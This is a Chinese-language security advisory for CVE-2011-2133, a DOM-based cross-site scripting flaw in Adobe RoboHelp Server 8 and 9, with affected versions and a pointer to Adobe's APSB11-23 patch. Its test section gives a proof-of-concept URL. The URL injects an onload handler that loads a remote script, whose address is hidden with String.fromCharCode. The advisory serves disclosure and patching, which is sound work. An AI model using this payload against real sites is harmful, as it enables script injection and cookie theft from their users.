发布日期：2011-08-09
更新日期：2011-08-09

受影响系统：

Adobe RoboHelp Server 9 9.0.1.232
Adobe RoboHelp Server 9
Adobe RoboHelp Server 8

不受影响系统：

Adobe RoboHelp Server 9 9.0.1.262

描述：

---

BUGTRAQ  ID: 49105
CVE(CAN) ID: CVE-2011-2133

Adobe RoboHelp软件是一个专业创作工具, 可用于开发帮助系统、电子教学内容、知识库以及方案和步骤。Adobe® RoboHelp® Server 软件扩展并支持Adobe RoboHelp 的功能, 为网站及内部网的桌面以及Web 应用程序和知识库提供帮助系统。

Adobe RoboHelp Server和RoboHelp在DOM的实现上存在跨站脚本执行漏洞，远程攻击者可利用此漏洞在受影响站点的用户浏览器中执行任意脚本代码，窃取Cookie验证凭证并发动其他攻击。

在返回给用户之前，某些未指定输入没有正确过滤。

<*来源：Roberto Suggi Liverani
  
  链接：http://www.adobe.com/support/security/bulletins/apsb11-23.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Roberto Suggi Liverani （）提供了如下测试方法：

http://www.example.com/WebHelp/index.htm#%22onload=%22a=document.createElement%28%27script%27%29;a.setAttribute%28%27src%27,String.fromCharCode%28104,116,116,112,58,47,47,109,97,108,101,114,105,115,99,104,46,110,101,116,47,97,46,106,115%29%29;document.body.appendChild%28a%29

建议：

---

厂商补丁：

Adobe
-----
Adobe已经为此发布了一个安全公告（APSB11-23）以及相应补丁:

APSB11-23：Security updates available for RoboHelp

链接：http://www.adobe.com/support/security/bulletins/apsb11-23.html

浏览次数：2269
严重程度：0（网友投票）